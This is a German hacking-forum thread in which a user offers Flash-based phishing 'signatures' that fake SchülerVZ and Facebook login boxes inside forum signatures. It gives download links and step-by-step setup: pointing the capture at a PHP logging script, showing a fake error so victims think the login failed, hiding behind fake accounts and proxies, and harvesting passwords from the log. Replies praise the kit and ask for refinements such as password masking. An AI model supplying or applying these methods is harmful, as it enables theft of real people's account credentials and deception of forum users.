Svz + Facebook Phishing Signatur

[phlippi]

Weiß nicht, ob es sowas schonmal gab, die Idee dazu is mir vorhin so spontan gekommen, da konnte ich nich wiederstehen, es zu coden:
Eine Phishing Signatur. Das ganze ist nicht einfach ein Link zu einer Phishing Seite, nein das war mir zu unseriös.
Das ganze ist mit Flash (Actionscript 2) programmiert und läuft ab Flashplayer8, den hat so gut wie jeder.
WIe man das nun einbindet:
In immer mehr Foren gibt es einen BB Code um Flash einzubinden. Der ist beispielsweise bei e107 [flash(height,width)]link_zu_flash[/flash]
Ihr braucht also nur ein Board, wo so ein BB-Code funktioniert. Das ganze hat den Vorteil, dass ihr keine Promo für eure Seite braucht, da es eh schon Public ist, ausserdem loggt sich ein User eher ein ein schon bestehendes LoginFeld ein, als dass er auf einen Phishing Link klickt. Nachteil ist jedoch, dass ihr wahrscehinlich gebannt werdet, also einen Fake-account erstellen und Proxy benutzen

SVZ:

( Screenshot: )


Das war jetzt so meine erste Idee. Der User kann sich also direkt im Forum dann dort einloggen. Es öffnet sich ein neuer Tab, schnell werden die Daten im angegeben Script in eine logdatei gespeichert und man wird zu SVZ weitergeletiet(vorrausgesetzt die Email geht durch die Emailprüfung. Es wird auf . und @ überprüft. Wenn diese nicht vorhanden sind, dann wird das ganze erst garnicht weitergegeben und eine Fehlermeldung eines inkorrekten Logins ausgegeben). Danach gibt die Signatur eine dieser doofen SVZ Meldungen aus (Fehlercode bla bla) und der User soll denken, das Login sei fehlgeschlagen, dabei wurden seine Daten bereits gespeichert .

Das Script hab ich euch natürlich bereitgestellt:

Downloadlink V2: http://www.sendspace.com/file/6heok5
Passwort: free-hack.com


Anleitung:
-Ladet euch die Datei herunter und enptackt sie.
-Öffnet die info.xml und tragt bei phpscript="" euren phpscript(den kompletten link, http://...) ein. Ebenfalls könnt ihr noch die Fehlermeldungen verändern, muss aber nicht. Die Fehlermeldung ist das, was später nach dem Login angezeigt wird. Das ist dafür, um dem User einen Grund zu geben, warum er jetzt nicht die "tollen" Features von SVZ Spy benutzen kann.
-Die Dateien auf einen Server ziehen.
-Die spy.swf in ein Forum in die Sig einbinden (Nicht die HTML datei !)
-Warten bis ein Idiot sich einloggt(hoffen, dass sie nicht zu schnell vom Admin entfernt wird, bzw dass der Admin das überhaupt checkt)
-Die #_database.log vom Server ziehen und mit nem Editor öffnen
-Spaß mit den Passwörtern haben


facebook:



Download:http://www.sendspace.com/file/3cp2kb
Passwort: free-hack.com

Anleitung (ein paar Unterschiede zu SVZ):
-Dateien runterladen und entpacken.
-Alle Dateien auf einen Server ziehen
-Die info.xml öffnen. Jetzt schreibt ihr bei phpscript="" euren Pfad zu der PHP Datei, die alles speichert, rein(facebookpro.php).Wichtig: Ihr müsst die ganze URL reinschreiben, mit "http://..." !
-Bei Bedarf könn ihr jetzt noch die Fehlermeldung, die ausgegeben wird ändern. Diese Fehlermeldung ist eigentlich garkeine, da kein Fehler besteht! Sie wird nur zum Fake dem User gezeigt, damit er sich nicht
wundert, wo denn nun seine tollen Features bleiben. Ausser könnt ihr noch die "Features", die euer Fake bieten soll, ändern.
-In einem Forum als Signatur nehmen
-Die #_database.log vom Server ziehen und mit nem Editor öffnen
-Spaß mit den Passwörtern haben xD

Ich hab das ganze nicht in den Phishing Sammelthread gepostet, da es sich ja hier um eine SIgnatur handelt, nicht um eine komplette Seite

[VooDoo666]

Respekt! Verdammt gute Idee und dann noch schön umgesetzt!

[hoschi111]

Passwort brauche ich fürs Archive ;D

Aber für die Idee gibst 10/10 Punkte!

[phlippi]

Jap, habs Passwort vergessen, sorry
Habs jetzt editiert, Passwort: free-hack.com

[PCFX]

Ich hab schon einige Phishing Seiten hier gesehen, mit guter Ideen aber Umsetzen so lala aber das sieht echt sehr gut aus!

[hoschi111]

Kannst du noch das Passwort als "*" anzeigen?
Sonst ist es unseriös.

[phlippi]

Ok bin dran, das auch noch als *** zu machen. Muss nurnoch bischen an der Komponente rumschrauben, dann wird das schon

Edit:
So habe den Downloadlink editiert, ist die neue Version. Das Passwort wird nun als *** angezeigt. Viel Spaß.

[script-kiddy]

Hätte noch ne Idee, aber weil ich eh nicht phishe....

Wie wäre es mit SVZ in Blau oder so?
Das wollen ja viele.

[phlippi]

Auch keine schlechte Idee, danke. Ich kann auch noch machen, dass man diese beiden "Vorteile" von SVZ Spy noch in der XML editieren kann (für mehr als 2 reicht der Platz in der Signatur leider nicht)
Ansonsten kann ich auch gerne ein Tutorial machen, wie man so eine Sig erstellt, wenn Bedarf besteht ^^

[LeadOr]

haha da muss man ja schon ein großer doofkopf sein